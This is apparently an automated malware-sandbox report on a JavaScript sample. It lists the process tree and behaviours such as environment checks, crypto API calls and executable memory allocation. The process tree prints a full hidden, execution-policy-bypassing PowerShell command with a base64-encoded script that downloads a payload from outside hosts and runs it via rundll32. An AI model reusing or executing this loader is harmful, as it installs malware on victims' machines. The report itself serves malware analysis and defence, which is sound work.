Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 12, 2023, 9:27 a.m.	May 12, 2023, 9:30 a.m.

Size	192.6KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`ce6f4ba124b7e93b1133bb0ee0e7e4e1`
SHA256	`fc288f764c7607c0e9d5d2c442abcf5c46562a45d66946ffc3f12cfa386121cd`
CRC32	`8F7DEB53`
ssdeep	`3072:tj0qQPXYjzeK2KY9iVpDChawwC9KFgvklqw+X72xbwEwPEAtL:t0rPXSz2iVpDCE+X72xVwPH`
Yara	Admin_Tool_IN_Zero - Admin Tool Sysinternals

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Lrvoys.js
1072
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Lrvoys.js" somever Unsuperlative
  2144
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAGEAcgBiAGEAcgBpAG8AdQBzAG4AZQBzAHMASABvAHIAbgBwAGkAcABlAHMAIAA9ACAAIgBhAGcAZwByAGEAYwBlAE0AbwBuAGcAaABvAGwAIgA7ACQAQgBhAGcAcgBvAG8AbQBXAGgAaQBtAHMAaQBjACAAPQAgADgAMAA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADEAMgA7ACQAUQB1AGkAZABuAHUAbgBjACAAPQAgACIATQBpAGwAbABpAG0AaQBjAHIAbwBuACIAOwAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGsAQQBMAGcAQQB4AEEARABNAEEATgB3AEEAdQBBAEQASQBBAE4AQQBBADQAQQBDADQAQQBNAFEAQQAyAEEARABNAEEATAB3AEIAWQBBAEcANABBAFUAUQBCAGsAQQBEAEkAQQBZAGcAQgBNAEEAQwA4AEEAUgB3AEIAUwBBAEUARQBBAFMAUQBBAHoAQQBIAGMAQQBkAFEAQgByAEEAQQA9AD0AYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAGsAQQBPAEEAQQB2AEEASABFAEEAWgBnAEIAaQBBAEcAWQBBAGQAUQBBAHYAQQBFAGcAQQBNAEEAQgA0AEEARQBZAEEATQBnAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQARQBBAEwAZwBBAHgAQQBEAGsAQQBNAHcAQQB1AEEARABRAEEATQB3AEEAdQBBAEQAawBBAE8AQQBBAHYAQQBFAEUAQQBSAHcAQgAyAEEARgBvAEEAYQBBAEEANABBAEUATQBBAEwAdwBCAHoAQQBEAEkAQQBhAFEAQgBaAEEASABFAEEAVABRAEEAPQBjAE8APQBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABjAEEATABnAEEAeABBAEQAVQBBAE8AQQBBAHYAQQBIAFUAQQBWAGcAQgAzAEEARwAwAEEATQBBAEIAQgBBAEMAOABBAFoAQQBCAEoAQQBFAGMAQQBVAHcAQgBGAEEARQBRAEEAYwBPAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAEUAQQBMAGcAQQB4AEEARABrAEEATQB3AEEAdQBBAEQAUQBBAE0AdwBBAHUAQQBEAEUAQQBNAEEAQQB4AEEAQwA4AEEAYQBBAEEAMwBBAEQARQBBAEwAdwBCAGoAQQBGAFkAQQBNAFEAQgBKAEEARABrAEEAVwBnAEIANgBBAEcAYwBBAGQAUQBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAZABlAHMAaQBsAGkAYwBvAG4AaQB6AGUAIABpAG4AIAAkAGIAcgBhAHQAaQBuAGEAQQBiAHMAaQBuAHQAaABlAHMAIAAtAHMAcABsAGkAdAAgACIAYwBPAD0ATgAiACkAIAB7ACQAdgBpAHIAZwB1AGwAYQB0AGUAQQBsAGkAYwBhAG4AdAAgAD0AIAAiAHAAbwBrAGUAYgBlAHIAcgBpAGUAcwBIAHkAbgBkAGUAcgAiADsAJABDAHIAYQBuAGUAeQAgAD0AIAAiAHMAZQBtAGkAYwBvAG4AdgBlAHIAZwBlAG4AdABUAGgAaQByAHQAaQBlAHMAIgA7AHQAcgB5ACAAewAkAHUAbgByAGUAYwBrAG8AbgBlAGQATABpAHAAbwBjAGwAYQBzAGkAcwAgAD0AIAAiAFQAbwBsAGwAdABhAGsAZQByACIAOwAkAFIAZQBzAHUAcABpAG4AYQB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgBBAEEAMABBAEMANABBAE0AZwBBAHcAQQBEAFEAQQBMAGcAQQB5AEEARABBAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADMAQQBBAD0APQAiADsAJABzAGkAdABvAHQAbwB4AGkAcwBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGQAZQBzAGkAbABpAGMAbwBuAGkAegBlACkAKQA7AHcAZwBlAHQAIAAkAHMAaQB0AG8AdABvAHgAaQBzAG0AIAAtAE8AIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABzAGUAbQBpAHMAbwBsAGUAbQBuAG4AZQBzAHMALgBHAHIAZQBmAGYAbwB0AG8AbQBlAEMAYQBuAGEAbgBnAGkAdQBtADsAJABwAGwAYQBuAG8AZwByAGEAcABoAGkAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABBAEEATABnAEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATgBRAEEAMABBAEEAPQA9AGcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQASQBBAE4AQQBBAHgAQQBDADQAQQBNAFEAQQAzAEEARABZAEEATABnAEEAeABBAEQASQBBAE0AUQBBAD0AZwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBuAEEARwBVAEEAYgBnAEIAbABBAEgASQBBAFkAUQBCAHMAQQBGAFUAQQBiAGcAQgBqAEEARwA4AEEAYgBnAEIAMgBBAEcAVQBBAGIAZwBCAHAAQQBHAFUAQQBiAGcAQgAwAEEAQwA0AEEAWQB3AEIAaABBAEcAWQBBAFoAUQBBAD0AIgA7ACQAZABhAHkAYgBvAG8AawBJAG4AZgBpAG4AaQB0AGEAdABpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQgBBAEgAVQBBAGQAQQBCAHYAQQBHAEUAQQBiAGcAQgAwAEEARwBrAEEAWQBnAEIAdgBBAEcAUQBBAGUAUQBBAHUAQQBIAEkAQQBaAFEAQgBwAEEASABNAEEAWgBRAEIAdQBBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAFEAQQB4AEEARABrAEEATABnAEEAeABBAEQATQBBAE8AQQBBAD0ARgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHkAQQBHAFUAQQBkAEEAQgBsAEEASABNAEEAZABBAEIAcABBAEcAMABBAGIAdwBCAHUAQQBHAGsAQQBaAFEAQgB6AEEARgBNAEEAWQBRAEIAcwBBAEgAQQBBAGEAUQBCAHUAQQBHAGMAQQBiAHcAQgB3AEEARwBFAEEAYgBBAEIAaABBAEgAUQBBAGEAUQBCAHUAQQBHAFUAQQBMAGcAQgAzAEEARwBrAEEAYQB3AEIAcABBAEEAPQA9AEYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwAwAEEAYQBRAEIAegBBAEcARQBBAFoAQQBCADIAQQBHAFUAQQBjAGcAQgAwAEEARwBVAEEAYgBnAEIAagBBAEcAVQBBAFUAdwBCADAAQQBIAGsAQQBiAEEAQgB2AEEARwA0AEEAZQBRAEIAagBBAEcAZwBBAGEAUQBCAGgAQQBDADQAQQBkAGcAQgBqAEEAQQA9AD0AIgA7ACQAcwBlAG0AaQBuAGkAdQBtAEcAZQBvAGQAaQBzAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBhAEEAQgBwAEEARwA4AEEAYgBnAEIAcABBAEcANABBAFoAUQBBAHUAQQBHAE0AQQBiAEEAQgBwAEEARwBNAEEAYQB3AEEAPQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMwBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQB4AEEARABnAEEATQBRAEEAdQBBAEQASQBBAE0AZwBBAHgAQQBBAD0APQB0AFkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBBAEEAMgBBAEMANABBAE0AUQBBADUAQQBEAFkAQQBMAGcAQQB5AEEARABBAEEATQB3AEEAdQBBAEQARQBBAE0AUQBBADMAQQBBAD0APQAiADsAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAHMAZQBtAGkAcwBvAGwAZQBtAG4AbgBlAHMAcwAuAEcAcgBlAGYAZgBvAHQAbwBtAGUAQwBhAG4AYQBuAGcAaQB1AG0AKQAuAEwAZQBuAGcAdABoACAALQBnAGUAIAAxADQANwA5ADQANAApAHsAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgBjAHcAQgAwAEEARwBFAEEAYwBnAEIAMABBAEMAQQBBAGMAZwBCADEAQQBHADQAQQBaAEEAQgBzAEEARwB3AEEATQB3AEEAeQBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBVAEEAQgB5AEEARwA4AEEAWgB3AEIAeQBBAEcARQBBAGIAUQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAYwB3AEIAbABBAEcAMABBAGEAUQBCAHoAQQBHADgAQQBiAEEAQgBsAEEARwAwAEEAYgBnAEIAdQBBAEcAVQBBAGMAdwBCAHoAQQBDADQAQQBSAHcAQgB5AEEARwBVAEEAWgBnAEIAbQBBAEcAOABBAGQAQQBCAHYAQQBHADAAQQBaAFEAQgBEAEEARwBFAEEAYgBnAEIAaABBAEcANABBAFoAdwBCAHAAQQBIAFUAQQBiAFEAQQBzAEEASABBAEEAYwBnAEIAcABBAEcANABBAGQAQQBBADcAQQBBAD0APQAiADsAJABPAHUAdABwAGwAbwBkAGQAZQBkACAAPQAgACIAdgBpAHQAbwBjAGgAZQBtAGkAYwBhAGwAIgA7ACQAZwByAGEAbgBkAGUAdgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAaQBBAEcAdwBBAGIAdwBCAGoAQQBHAHMAQQBhAFEAQgB1AEEARwBjAEEAVABBAEIAbABBAEgAQQBBAGEAUQBCAGsAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAZwBCAHIAQQBBAD0APQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE4AZwBBAHUAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATQBnAEEAeABBAEQAUQBBAEwAZwBBADEAQQBEAE0AQQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGMAZwBCAGwAQQBIAEEAQQBZAFEAQgBzAEEARwBFAEEAWgBRAEIAdgBBAEcAdwBBAGEAUQBCADAAQQBHAGcAQQBhAFEAQgBqAEEAQwA0AEEAYwBBAEIAaABBAEgASQBBAGQAQQBCAHUAQQBHAFUAQQBjAGcAQgB6AEEAQQA9AD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAE0AQQBiAHcAQgB1AEEARwBNAEEAWgBRAEIAeQBBAEcANABBAFoAUQBCAGsAQQBHADQAQQBaAFEAQgB6AEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AIgA7AGIAcgBlAGEAawA7AH0AUgBlAGEAYwB0AEQATwBNADsAfQAgAGMAYQB0AGMAaAAgAHsAJABBAGQAaQBnAGUAaQBUAGgAeQBzAGUAbgAgAD0AIAAiAGEAdgBpAGEAbgBpAHoAZQBkAEIAbABhAHMAdABvAGMAaABlAG0AZQAiADsAJABIAHkAcABlAHIAZABpAHYAaQBzAGkAbwBuACAAPQAgACIAcABhAHIAYQBmAGwAbwBjAGMAdQBsAGEAcgAiADsAJABBAGMAZQB0AHkAbABjAHkAYQBuAGkAZABlAFEAdQBpAGQAZABsAGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBGAEEASABnAEEAYwBBAEIAcwBBAEcAOABBAGEAUQBCADAAQQBFAE0AQQBiAHcAQgB5AEEASABNAEEAWgBRAEIAcwBBAEcAVQBBAGQAQQBCAGwAQQBHAFEAQQBMAGcAQgBwAEEARwA0AEEAZABBAEIAbABBAEgASQBBAGIAZwBCAGgAQQBIAFEAQQBhAFEAQgB2AEEARwA0AEEAWQBRAEIAcwBBAEEAPQA9AHYARgBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAyAEEAQwA0AEEATQBRAEEAMQBBAEQAZwBBAEwAZwBBAHgAQQBEAGMAQQBOAFEAQQA9ACIAOwB9AH0AJAB0AGEAcgBhAHAAbwBuACAAPQAgACIAQQBuAHQAbABlAHIAcwBCAGEAZQBkAGUAawBlAHIAaQBhAG4AIgA7ACQAdABvAGwAegBlAHkAVQBuAHMAdAByAHUAYwB0AHUAcgBhAGwAIAA9ACAANQA2ADIAOwAkAFMAbwBhAHIAaQBuAGcAcwBSAGUAZQBuAHUAbgBjAGkAYQB0AGUAZAAgAD0AIAAiAHYAZQByAHIAdQBjAG8AdQBzACIAOwA="
    2280

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 12, 2023, 9:27 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 12, 2023, 9:27 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 12, 2023, 9:27 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 12, 2023, 9:27 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 12, 2023, 9:27 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 12, 2023, 9:27 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 12, 2023, 9:27 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (42 events)

Time & API	Arguments	Status	Return
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1d58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1698 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1698 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1698 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1698 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1698 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1698 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e1e98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e21d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e21d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e21d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e21d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e21d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e21d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e21d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e21d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e21d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e21d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e21d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e21d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e21d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e21d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2258 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2258 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2258 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 12, 2023, 9:27 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005e2258 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 12, 2023, 9:27 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 134 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02510000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02580000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72fd2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02581000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02582000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02517000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 12, 2023, 9:27 a.m.	process_identifier: 2280 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02515000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
